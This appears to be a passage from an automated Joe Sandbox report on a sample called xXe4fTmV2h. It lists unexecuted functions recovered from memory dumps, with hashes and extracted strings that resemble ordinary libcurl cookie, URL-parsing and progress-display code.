                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Opcode ID: d286fd41005bf86719337888b74faebbc1712061b49bf40cf20ba2a25d4f893d
                                      • Instruction ID: 56fe54123b750a6072d44558a8c218460c9606abe57c301681075d12ba4c8914
                                      • Opcode Fuzzy Hash: d286fd41005bf86719337888b74faebbc1712061b49bf40cf20ba2a25d4f893d
                                      • Instruction Fuzzy Hash: 7B3192B49093159FCB10FFB8C5896AEBBF4AF44344F008969E8D9A7340E7349A45DF92

                                      Non-executed Functions

                                      Function 00C41BE0 Relevance: 33.9, Strings: 26, Instructions: 1418COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                      • API String ID: 0-1371176463
                                      • Opcode ID: eb7446ccb6ca88cf2c7bb66673dd35ff7338ae22804eac3f33297a1afd928bb3
                                      • Instruction ID: c4778f2e49de526e89f48530fa505178558e03c2617a96c6c27ff57503bb1316
                                      • Opcode Fuzzy Hash: eb7446ccb6ca88cf2c7bb66673dd35ff7338ae22804eac3f33297a1afd928bb3
                                      • Instruction Fuzzy Hash: D6B23770E08300ABEB24AA25DC47B767BD5BF94304F48452CFC999B292E771EE44E751
                                      Function 00C14940 Relevance: 17.0, Strings: 13, Instructions: 731COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                      • API String ID: 0-122532811
                                      • Opcode ID: faba46e4eae0e1b9cc3ea7edf912851641c381d0868f081adcee359d5cccab65
                                      • Instruction ID: 6acb0db5008ed13a8fb87fbbc9c517c613295a440ec741233fca6eafad43298c
                                      • Opcode Fuzzy Hash: faba46e4eae0e1b9cc3ea7edf912851641c381d0868f081adcee359d5cccab65
                                      • Instruction Fuzzy Hash: A4421771B08700AFD708DE28CC41BABB7EAEFC5700F048A2CF55997381D775A9559B92
                                      Function 00C13ED0 Relevance: 15.7, Strings: 12, Instructions: 689COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
                                      • API String ID: 0-3977460686
                                      • Opcode ID: fc72cbbb5a425df7a91be7376d79976227fc0f475e80546c84eeb3b0ed8420e5
                                      • Instruction ID: 1a5346afabceaaf7c6b48f0037cd9a39021a6ddeaf9525882e3df55542eaacda
                                      • Opcode Fuzzy Hash: fc72cbbb5a425df7a91be7376d79976227fc0f475e80546c84eeb3b0ed8420e5
                                      • Instruction Fuzzy Hash: E1326BB1A083014BC728AF299C4139AB7D69F87324F15472DF9B58B3D1E734DAC5A782
                                      Function 00CB9880 Relevance: 15.2, Strings: 12, Instructions: 226COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: -vc$ans$ate$attempts$ndot$out$retr$retr$rota$time$use-$usev
                                      • API String ID: 0-1574211403
                                      • Opcode ID: e8d05c473407284f50be4db812dd8f5974ff4c49030f4acc12e3b9cf301fa82e
                                      • Instruction ID: fa59fa4d8d40ce2fd85ab8331ced4571ac5cc153ef00203104184d1a15903e29
                                      • Opcode Fuzzy Hash: e8d05c473407284f50be4db812dd8f5974ff4c49030f4acc12e3b9cf301fa82e
                                      • Instruction Fuzzy Hash: CA6117B5E0830067EB54A620EC42FBBB699DB90304F04843DFD4F96293FA71DE049293
                                      Function 00C24F70 Relevance: 12.2, Strings: 9, Instructions: 911COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                      • API String ID: 0-1914377741
                                      • Opcode ID: fcab4cc6a418ed59ddc136ff5be332c3a6080912191c42bcffdf1d570a67dc09
                                      • Instruction ID: 556807b365bc1f4a5019ffc1a3358d6d5c223ea4b3dc1ebb9271a626de2ccfa5
                                      • Opcode Fuzzy Hash: fcab4cc6a418ed59ddc136ff5be332c3a6080912191c42bcffdf1d570a67dc09
                                      • Instruction Fuzzy Hash: A972AD30A08B519FE7359A28E5467A7B7D2AF90340F08C62CEC945B693E7B6DEC4C741
                                      Function 00C15DB0 Relevance: 10.1, Strings: 8, Instructions: 114COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld
                                      • API String ID: 0-3476178709
                                      • Opcode ID: 26100d8cfc36ed418aa4ee2e8dc6d77b8e12a6c2afb98d218615f6c4ff2d68be
                                      • Instruction ID: 9690aaf03e7b43013841aeb0d74a1f1582ad280e2e8d755fe03547fcdada1402
                                      • Opcode Fuzzy Hash: 26100d8cfc36ed418aa4ee2e8dc6d77b8e12a6c2afb98d218615f6c4ff2d68be
                                      • Instruction Fuzzy Hash: B731A973B54A45BAF72C200ADC86F7E105BC3C6B10F6EC23EB5169B2C1D8F55D416265
                                      Function 00CCEF90 Relevance: 9.4, Strings: 7, Instructions: 688COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $.$;$?$?$xn--$xn--
                                      • API String ID: 0-543057197
                                      • Opcode ID: 5f951194c147b677c80f6957897104b142f474ca8f32357b884bb90262f21c76
                                      • Instruction ID: 5badd00eb5b3eb625d79de1ddcccf4f930b2a13d5c10d635ff1a0f8535c748fa
                                      • Opcode Fuzzy Hash: 5f951194c147b677c80f6957897104b142f474ca8f32357b884bb90262f21c76
                                      • Instruction Fuzzy Hash: 912227B2A04301ABEB209B24DC41F6F77E6AF91308F18443DF99993292E735DE06D752
                                      Function 00F8E050 Relevance: 9.1, APIs: 1, Strings: 3, Instructions: 2082COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $d$nil)
                                      • API String ID: 0-394766432
                                      • Opcode ID: 2b5e348bf7078310c947f685da47d145bd5f80a340c8d23ac4f7254f388a8ad7
                                      • Instruction ID: a6e97b185d1669e3d5290b5491b6f76445dcc414543fc1ca239a9dd5a0918dbc
                                      • Opcode Fuzzy Hash: 2b5e348bf7078310c947f685da47d145bd5f80a340c8d23ac4f7254f388a8ad7
                                      • Instruction Fuzzy Hash: 31139E71A083418FD720EF28C4807AABBE1BFC9364F14492DE9959B361D775EC49EB42
                                      Function 00C0A960 Relevance: 9.0, Strings: 6, Instructions: 1493COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                      • API String ID: 0-2555271450
                                      • Opcode ID: 35d24b5713f12890e71ed8e8ce46434b882b839f2ca34f5df996aed9c2107f13
                                      • Instruction ID: 2403d77990643a0ada776a08f62f35c3bc475d884dd42764a335756e4d3df648
                                      • Opcode Fuzzy Hash: 35d24b5713f12890e71ed8e8ce46434b882b839f2ca34f5df996aed9c2107f13
                                      • Instruction Fuzzy Hash: 44C26A71A087418FD718CF29C49066AB7E2EFC9314F15CA2DE8A99B395D730ED45CB82
                                      Function 00C0E620 Relevance: 8.5, Strings: 6, Instructions: 1028COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_c00000_xXe4fTmV2h.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                      • API String ID: 0-2555271450
                                      • Opcode ID: 696de96e9e2744e91a386e1da4a09045468765aae18a3ca6a9f200f10a10a62e
                                      • Instruction ID: ba1cf14c74a1ec769df7f3a706a562f5db999010a951e3ef97aec8d87acfcabe
                                      • Opcode Fuzzy Hash: 696de96e9e2744e91a386e1da4a09045468765aae18a3ca6a9f200f10a10a62e
                                      • Instruction Fuzzy Hash: 87829E71A083019FD724CE29C88072BB7E1AFC9764F188A2DF9A9972D1D730DD46DB52
                                      Function 00C66210 Relevance: 7.9, Strings: 6, Instructions: 419COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1426008642.0000000000C01000.00000040.00000001.01000000.00000004.sdmp, Offset: 00C00000, based on PE: true
                                      • Associated: 00000005.00000002.1425991500.0000000000C00000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.0000000001171000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D7000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426008642.00000000012D9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426543785.00000000012DC000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.00000000012DE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001455000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000156E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001571000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.000000000164F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001658000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426566082.0000000001667000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1426906163.0000000001668000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427051261.0000000001819000.00000040.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000005.00000002.1427077219.000000000181B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
